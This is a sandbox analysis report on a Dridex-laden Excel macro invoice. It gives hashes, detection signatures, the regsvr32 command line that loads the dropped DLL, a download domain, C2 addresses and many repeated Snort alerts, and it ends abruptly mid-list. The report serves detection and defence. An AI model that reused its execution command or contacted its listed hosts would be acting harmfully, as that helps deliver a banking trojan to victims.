Loading ...

Play interactive tourEdit tour

Analysis Report Inv0209966048-20210111075675.xls

Overview

General Information

Sample Name:Inv0209966048-20210111075675.xls
Analysis ID:338362
MD5:91baa6aad9201c0ccf3553a5b49eb967
SHA1:9c182826d5dc041970f31a8d584580f870c3996c
SHA256:01af3b5c1e2ed68272f542233aece70269a9e977815347a4b9c86bb2d97c086e
Tags:Dridexxls

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Dridex
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Dridex e-Banking trojan
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: BlueMashroom DLL Load
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Document contains an embedded VBA macro which may execute processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Regsvr32 Anomaly
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops certificate files (DER)
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains sections with non-standard names
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the installation date of Windows
Registers a DLL
Uses code obfuscation techniques (call, push, ret)
Yara detected Xls With Macro 4.0

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2028 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 2356 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\lwjmdgav.dll. MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2328 cmdline: -s C:\Users\user\AppData\Local\Temp\lwjmdgav.dll. MD5: 432BE6CF7311062633459EEF6B242FB5)
    • DW20.EXE (PID: 3052 cmdline: 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1488 MD5: 45A078B2967E0797360A2D4434C41DB4)
      • DWWIN.EXE (PID: 2968 cmdline: C:\Windows\system32\dwwin.exe -x -s 1488 MD5: 25247E3C4E7A7A73BAEEA6C0008952B1)
  • cleanup

Malware Configuration

Threatname: Dridex

{"Config: ": ["--------------------------------------------------", "BOT ID", "--------------------------------------------------", "Bot id : 61074", "--------------------------------------------------", "IP Address table", "--------------------------------------------------", "Address count 0"]}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
Inv0209966048-20210111075675.xlsJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: BlueMashroom DLL LoadShow sources
    Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\lwjmdgav.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\lwjmdgav.dll., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2028, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\lwjmdgav.dll., ProcessId: 2356
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\lwjmdgav.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\lwjmdgav.dll., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2028, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\lwjmdgav.dll., ProcessId: 2356
    Sigma detected: Regsvr32 AnomalyShow sources
    Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\lwjmdgav.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\lwjmdgav.dll., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2028, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\lwjmdgav.dll., ProcessId: 2356

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Found malware configurationShow sources
    Source: 4.2.regsvr32.exe.590000.1.raw.unpackMalware Configuration Extractor: Dridex {"Config: ": ["--------------------------------------------------", "BOT ID", "--------------------------------------------------", "Bot id : 61074", "--------------------------------------------------", "IP Address table", "--------------------------------------------------", "Address count 0"]}
    Multi AV Scanner detection for submitted fileShow sources
    Source: Inv0209966048-20210111075675.xlsVirustotal: Detection: 45%Perma Link
    Source: Inv0209966048-20210111075675.xlsMetadefender: Detection: 16%Perma Link
    Source: Inv0209966048-20210111075675.xlsReversingLabs: Detection: 34%
    Machine Learning detection for dropped fileShow sources
    Source: C:\Users\user\AppData\Local\Temp\lwjmdgav.dllJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\w80l82r[1].zipJoe Sandbox ML: detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: unknownHTTPS traffic detected: 104.27.153.52:443 -> 192.168.2.22:49165 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49166 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49171 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49175 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49179 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49183 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49187 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49191 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49195 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49199 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49203 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49207 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49212 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49216 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49220 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49224 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49228 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49233 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49238 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49242 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49246 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49250 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49254 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49258 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49262 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49266 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49270 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49274 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49278 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49282 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49286 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49290 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49294 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49298 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49302 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49306 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49310 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49314 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49318 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49322 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49326 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49330 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49334 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49338 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49342 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49346 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49350 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49354 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49358 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49362 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49366 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49370 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49374 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49378 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49382 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49386 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49390 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49394 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49398 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49402 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49406 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49410 version: TLS 1.2
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008BCEF8 FindFirstFileExW,

    Software Vulnerabilities:

    barindex
    Document exploit detected (creates forbidden files)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\lwjmdgav.dllJump to behavior
    Document exploit detected (drops PE files)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: w80l82r[1].zip.0.drJump to dropped file
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
    Source: global trafficDNS query: name: education.scrollx.in
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.27.153.52:443
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.27.153.52:443

    Networking:

    barindex
    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49166
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49168
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49169
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49169
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49171
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49172
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49173
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49173
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49175
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49176
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49177
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49177
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49179
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49180
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49181
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49181
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49183
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49184
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49185
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49185
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49187
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49188
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49189
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49189
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49191
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49192
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49193
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49193
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49195
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49196
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49197
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49197
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49199
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49200
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49201
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49201
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49203
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49204
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49205
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49205
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49207
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49208
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49209
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49209
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49210
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49210
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49212
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49213
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49214
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49214
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49216
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49217
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49218
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49218
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49220
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49221
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49222
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49222
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49224
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49225
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49226
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49226
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49228
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49229
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49230
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49230
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49233
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49234
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49236
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49236
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49238
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49239
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49240
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49240
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49242
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49243
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49244
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49244
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49246
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49247
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49248
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49248
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49250
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49251
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49252
